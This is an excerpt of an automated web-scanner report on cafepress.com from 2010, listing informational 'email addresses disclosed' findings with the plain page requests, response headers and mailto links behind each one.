__utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 174544 Date: Sun, 26 Dec 2010 13:48:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 174544 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... <div id="mainContent"> <script language="JavaScript1.1" src="http://content4.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script><script language="javascript" src="http://content9.cpcache.com/marketplace/js/sarissa.js"> </script><script language="javascript" src="http://content7.cpcache.com/marketplace/js/sarissa_ieemu_xpath.js"> </script><script type="text/javascript" src="http://content6.cpcache.com/js/jquery/jcarousel/lib/jquery.jcarousel.js"> </script>...[SNIP]...
6. Email addresses disclosed
There are 11 instances of this issue:
Issue background
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content. However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
6.1. http://www.cafepress.com/TheGamingApe
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/TheGamingApe
Issue detail
The following email address was disclosed in the response:
Request
GET /TheGamingApe HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 49058 Date: Sun, 26 Dec 2010 13:48:58 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 49058 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook...[SNIP]... <a href="mailto:contact@thegamingape.com ">...[SNIP]...
6.2. http://www.cafepress.com/make/custom-baby-gear
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-baby-gear
Issue detail
The following email address was disclosed in the response:
Request
GET /make/custom-baby-gear HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 71150 Date: Sun, 26 Dec 2010 13:48:09 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 71150 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... <a href="mailto:support@cafepress.com ">...[SNIP]...
6.3. http://www.cafepress.com/make/custom-buttons
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-buttons
Issue detail
The following email address was disclosed in the response:
Request
GET /make/custom-buttons HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 54710 Date: Sun, 26 Dec 2010 13:47:58 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 54710 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... <a href="mailto:support@cafepress.com ">...[SNIP]...
6.4. http://www.cafepress.com/make/custom-ipad-case
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-ipad-case
Issue detail
The following email address was disclosed in the response:
Request
GET /make/custom-ipad-case HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 55427 Date: Sun, 26 Dec 2010 13:48:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 55427 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... <a href="mailto:support@cafepress.com ">...[SNIP]...
6.5. http://www.cafepress.com/make/custom-iphone-cases
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-iphone-cases
Issue detail
The following email address was disclosed in the response:
Request
GET /make/custom-iphone-cases HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 57068 Date: Sun, 26 Dec 2010 13:48:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 57068 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... <a href="mailto:eteamz@CafePress.com ">...[SNIP]...
6.6. http://www.cafepress.com/make/custom-stickers
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-stickers
Issue detail
The following email address was disclosed in the response:
Request
GET /make/custom-stickers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 55145
Date: Sun, 26 Dec 2010 13:47:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
<a href="mailto:support@cafepress.com ">...[SNIP]...
6.7. http://www.cafepress.com/make/custom-stockings
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-stockings
Issue detail
The following email address was disclosed in the response: someemail@cafepress.com
Request
GET /make/custom-stockings HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
